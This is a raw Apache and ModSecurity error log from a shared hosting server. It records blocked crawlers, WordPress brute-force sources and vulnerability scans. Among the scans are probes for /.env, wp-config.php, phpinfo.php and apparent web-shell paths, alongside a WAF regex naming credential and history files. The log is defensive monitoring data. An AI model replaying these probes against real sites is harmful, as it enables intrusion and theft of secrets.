[Tue May 26 13:25:20.511904 2026] [security2:error] [pid 512344:tid 512596] [client 185.191.171.2:40668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/list/"] [unique_id "ahVR6MbElyei4S77DQf1KQAAAHo"]
[Tue May 26 13:25:20.512097 2026] [security2:error] [pid 512344:tid 512596] [client 185.191.171.2:40668] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/list/"] [unique_id "ahVR6MbElyei4S77DQf1KQAAAHo"]
[Tue May 26 13:25:22.051257 2026] [security2:error] [pid 512344:tid 512558] [client 209.141.36.175:65154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.36.141.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVR6cbElyei4S77DQf1SgAAAFQ"]
[Tue May 26 13:25:22.126488 2026] [security2:error] [pid 512344:tid 512589] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR6cbElyei4S77DQf1SQAAAHM"]
[Tue May 26 13:25:22.208732 2026] [security2:error] [pid 512344:tid 512583] [client 176.65.139.238:61450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "usteve.com"] [uri "/.env"] [unique_id "ahVR6sbElyei4S77DQf1UgAAAG0"]
[Tue May 26 13:25:25.030022 2026] [security2:error] [pid 512745:tid 512981] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR7HKSB_s2CvZg7xNcBAAAAXQ"]
[Tue May 26 13:25:26.743024 2026] [security2:error] [pid 512745:tid 512986] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR7nKSB_s2CvZg7xNcLgAAAXk"]
[Tue May 26 13:25:29.681294 2026] [security2:error] [pid 512344:tid 512531] [client 114.119.128.158:62471] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/portfolio/soft-bathmats"] [unique_id "ahVR8cbElyei4S77DQf1rwAAADk"], referer: https://www.anujtradingco.com/portfolio/soft-bathmats/
[Tue May 26 13:25:29.990236 2026] [security2:error] [pid 512344:tid 512488] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR8cbElyei4S77DQf1qwAAAA4"]
[Tue May 26 13:25:32.104786 2026] [security2:error] [pid 512344:tid 512572] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR88bElyei4S77DQf12QAAAGI"]
[Tue May 26 13:25:33.379022 2026] [security2:error] [pid 512745:tid 512968] [client 146.174.166.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR9HKSB_s2CvZg7xNcgQAAAWc"]
[Tue May 26 13:25:34.414928 2026] [security2:error] [pid 512344:tid 512550] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR9cbElyei4S77DQf2AAAAAEw"]
[Tue May 26 13:25:36.803778 2026] [security2:error] [pid 512344:tid 512580] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR-MbElyei4S77DQf2HAAAAGo"]
[Tue May 26 13:25:39.210342 2026] [security2:error] [pid 512344:tid 512530] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR-sbElyei4S77DQf2PgAAADg"]
[Tue May 26 13:25:42.367021 2026] [security2:error] [pid 512344:tid 512495] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR_cbElyei4S77DQf2dgAAABU"]
[Tue May 26 13:25:43.813123 2026] [security2:error] [pid 512745:tid 512962] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR_3KSB_s2CvZg7xNdCQAAAWE"]
[Tue May 26 13:25:45.979973 2026] [security2:error] [pid 512344:tid 512545] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSAcbElyei4S77DQf2xAAAAEc"]
[Tue May 26 13:25:46.500598 2026] [security2:error] [pid 512344:tid 512366] [remote 95.216.117.13:56832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVSAsbElyei4S77DQf20QAAARU"]
[Tue May 26 13:25:48.254035 2026] [security2:error] [pid 512745:tid 512863] [remote 178.104.164.71:45648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVSBHKSB_s2CvZg7xNdMwABb3U"]
[Tue May 26 13:25:48.479145 2026] [security2:error] [pid 512344:tid 512532] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSBMbElyei4S77DQf25gAAADo"]
[Tue May 26 13:25:48.709577 2026] [security2:error] [pid 512745:tid 512891] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVSA3KSB_s2CvZg7xNdKgABGmA"]
[Tue May 26 13:25:50.243954 2026] [security2:error] [pid 512344:tid 512547] [client 20.151.111.128:3473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVSBsbElyei4S77DQf3AgAAAEk"], referer: www.google.com
[Tue May 26 13:25:50.244003 2026] [security2:error] [pid 512344:tid 512539] [client 20.151.111.128:3479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-plain.php"] [unique_id "ahVSBsbElyei4S77DQf3AQAAAEE"], referer: www.google.com
[Tue May 26 13:25:50.287409 2026] [security2:error] [pid 512745:tid 512793] [remote 47.128.46.93:47356] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/ressources/securite-alimentaire-foncier/706-etude-sur-la-contribution-des-exploitations-familiales-a-la-securite-alimentaire-dans-la-region-de-dakar"] [unique_id "ahVSBnKSB_s2CvZg7xNdcAABJC8"]
[Tue May 26 13:25:50.747805 2026] [security2:error] [pid 512745:tid 512900] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSBnKSB_s2CvZg7xNdcwAAASM"]
[Tue May 26 13:25:52.011196 2026] [security2:error] [pid 512745:tid 512907] [client 20.151.111.128:13108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/itxicznc.php"] [unique_id "ahVSCHKSB_s2CvZg7xNdjgAAASo"], referer: www.google.com
[Tue May 26 13:25:53.405554 2026] [security2:error] [pid 512745:tid 512918] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSCHKSB_s2CvZg7xNdpAAAATU"]
[Tue May 26 13:25:55.596419 2026] [security2:error] [pid 512344:tid 512576] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSC8bElyei4S77DQf3KQAAAGY"]
[Tue May 26 13:25:56.309149 2026] [security2:error] [pid 512745:tid 512880] [client 20.151.111.128:4044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-plain.php"] [unique_id "ahVSDHKSB_s2CvZg7xNd3wAAAQ8"], referer: www.google.com
[Tue May 26 13:25:56.357690 2026] [security2:error] [pid 512344:tid 512594] [client 20.151.111.128:12447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVSDMbElyei4S77DQf3NQAAAHg"], referer: www.google.com
[Tue May 26 13:25:56.488116 2026] [security2:error] [pid 512745:tid 512996] [client 20.151.111.128:12430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "veganfoodindia.com"] [uri "/index.php"] [unique_id "ahVSDHKSB_s2CvZg7xNd4QAAAYM"], referer: www.google.com
[Tue May 26 13:25:56.733924 2026] [security2:error] [pid 512745:tid 512983] [client 20.151.111.128:12458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVSDHKSB_s2CvZg7xNd5QAAAXY"]
[Tue May 26 13:25:56.838297 2026] [security2:error] [pid 512745:tid 512914] [client 20.151.111.128:12430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "veganfoodindia.com"] [uri "/index.php"] [unique_id "ahVSDHKSB_s2CvZg7xNd5AAAATE"], referer: www.google.com
[Tue May 26 13:25:57.292532 2026] [security2:error] [pid 512344:tid 512527] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSDMbElyei4S77DQf3QAAAADU"]
[Tue May 26 13:25:57.917854 2026] [security2:error] [pid 512344:tid 512548] [client 138.229.108.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSDcbElyei4S77DQf3UwAAAEo"], referer: https://www.anujtradingco.com/
[Tue May 26 13:25:59.077257 2026] [security2:error] [pid 512745:tid 512942] [client 138.229.108.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSDnKSB_s2CvZg7xNd_QAAAU0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 13:26:00.149555 2026] [security2:error] [pid 512745:tid 512981] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSD3KSB_s2CvZg7xNeBwAAAXQ"]
[Tue May 26 13:26:00.841993 2026] [security2:error] [pid 512745:tid 512887] [client 20.151.111.128:3397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVSEHKSB_s2CvZg7xNeFQAAARY"]
[Tue May 26 13:26:00.878175 2026] [core:crit] [pid 512344:tid 512482] (13)Permission denied: [client 52.167.144.183:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:26:00.944602 2026] [security2:error] [pid 512745:tid 512923] [client 20.151.111.128:13026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/kwfaeayw.php"] [unique_id "ahVSEHKSB_s2CvZg7xNeFwAAATo"], referer: www.google.com
[Tue May 26 13:26:01.499262 2026] [security2:error] [pid 512344:tid 512512] [client 181.214.165.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSEcbElyei4S77DQf3jQAAACY"]
[Tue May 26 13:26:02.498671 2026] [security2:error] [pid 512745:tid 512835] [remote 171.240.128.80:38392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.128.240.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVSEnKSB_s2CvZg7xNeMgABZFk"]
[Tue May 26 13:26:02.560178 2026] [security2:error] [pid 512745:tid 512958] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSEnKSB_s2CvZg7xNeLwAAAV0"]
[Tue May 26 13:26:04.207748 2026] [security2:error] [pid 512745:tid 512884] [client 20.151.111.128:3852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVSFHKSB_s2CvZg7xNeUgAAARM"]
[Tue May 26 13:26:04.974727 2026] [security2:error] [pid 512745:tid 512895] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSFHKSB_s2CvZg7xNeVwAAAR4"]
[Tue May 26 13:26:05.069850 2026] [core:crit] [pid 512745:tid 512997] (13)Permission denied: [client 40.77.167.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:26:05.753324 2026] [security2:error] [pid 512745:tid 512904] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVSFHKSB_s2CvZg7xNeXQABJzs"]
[Tue May 26 13:26:08.137132 2026] [security2:error] [pid 512745:tid 512957] [client 20.151.111.128:3846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVSGHKSB_s2CvZg7xNeiQAAAVw"]
[Tue May 26 13:26:09.261250 2026] [security2:error] [pid 512745:tid 512941] [client 91.92.42.63:12486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/wp-config.php"] [unique_id "ahVSGXKSB_s2CvZg7xNemgAAAUw"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:26:09.303651 2026] [security2:error] [pid 512745:tid 512900] [client 91.92.42.63:12490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jkjuice.taotechservices.com"] [uri "/.env"] [unique_id "ahVSGXKSB_s2CvZg7xNenAAAASM"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:26:09.329669 2026] [security2:error] [pid 512745:tid 512974] [client 91.92.42.63:12506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/phpinfo.php"] [unique_id "ahVSGXKSB_s2CvZg7xNenQAAAW0"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:26:09.337924 2026] [security2:error] [pid 512745:tid 512934] [client 91.92.42.63:12520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/info.php"] [unique_id "ahVSGXKSB_s2CvZg7xNengAAAUU"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:26:09.403236 2026] [security2:error] [pid 512344:tid 512574] [client 91.92.42.63:12538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/config.php"] [unique_id "ahVSGcbElyei4S77DQf37QAAAGQ"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:26:09.649427 2026] [security2:error] [pid 512344:tid 512478] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSGcbElyei4S77DQf36QAAAAQ"]
[Tue May 26 13:26:09.957110 2026] [security2:error] [pid 512745:tid 512886] [client 91.92.42.63:12576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/config.php"] [unique_id "ahVSGXKSB_s2CvZg7xNeqQAAARU"], referer: http://taotechservices.com/
[Tue May 26 13:26:09.978146 2026] [security2:error] [pid 512745:tid 512951] [client 91.92.42.63:12586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/info.php"] [unique_id "ahVSGXKSB_s2CvZg7xNeqgAAAVY"], referer: http://taotechservices.com/
[Tue May 26 13:26:10.008946 2026] [security2:error] [pid 512745:tid 512952] [client 91.92.42.63:12588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-config.php"] [unique_id "ahVSGnKSB_s2CvZg7xNeqwAAAVc"], referer: http://taotechservices.com/
[Tue May 26 13:26:10.097298 2026] [security2:error] [pid 512745:tid 512942] [client 91.92.42.63:12606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env"] [unique_id "ahVSGnKSB_s2CvZg7xNergAAAU0"], referer: http://taotechservices.com/
[Tue May 26 13:26:10.097853 2026] [security2:error] [pid 512745:tid 512892] [client 91.92.42.63:12612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/phpinfo.php"] [unique_id "ahVSGnKSB_s2CvZg7xNerwAAARs"], referer: http://taotechservices.com/
[Tue May 26 13:26:10.331572 2026] [security2:error] [pid 512344:tid 512485] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVSGcbElyei4S77DQf37gAAAAs"], referer: http://jkjuice.taotechservices.com/
